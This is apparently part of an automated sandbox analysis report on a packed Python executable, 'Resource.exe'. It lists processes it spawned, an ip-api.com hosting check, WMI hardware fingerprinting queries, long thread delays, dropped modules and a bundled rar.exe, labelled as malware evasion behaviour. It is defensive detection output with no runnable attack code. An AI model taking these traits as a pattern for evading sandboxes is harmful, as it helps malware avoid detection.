              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.1.0
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8444Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 980Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8314Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1116Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4562
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2653
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3366
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 745
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3754
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1163
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3722
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 732
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3586
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 697
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2195
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1796
              Source: C:\Users\user\Desktop\Resource.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\python311.dllJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_bz2.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.dllJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\Resource.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17110
              Source: C:\Users\user\Desktop\Resource.exeAPI coverage: 9.1 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep count: 8444 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep count: 980 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -9223372036854770s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep count: 8314 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488Thread sleep count: 1116 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep time: -8301034833169293s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep count: 4562 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep count: 321 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep count: 2653 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092Thread sleep count: 57 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep count: 3366 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376Thread sleep count: 745 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep count: 3754 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep count: 1163 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6428Thread sleep count: 3722 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2212Thread sleep count: 732 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep count: 3586 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep count: 697 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep count: 2195 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep count: 1796 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6848Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2360Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\PING.EXELast function: Thread delayed
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6E60B7E4C
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6E60B7E4C
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60A88D0 FindFirstFileExW,FindClose,0_2_00007FF6E60A88D0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60C1EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6E60C1EE4
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185E46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,103_2_00007FF6185E46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185DE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,103_2_00007FF6185DE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6186288E0 FindFirstFileExA,103_2_00007FF6186288E0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87E0180 GetSystemInfo,1_2_00007FF8A87E0180
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
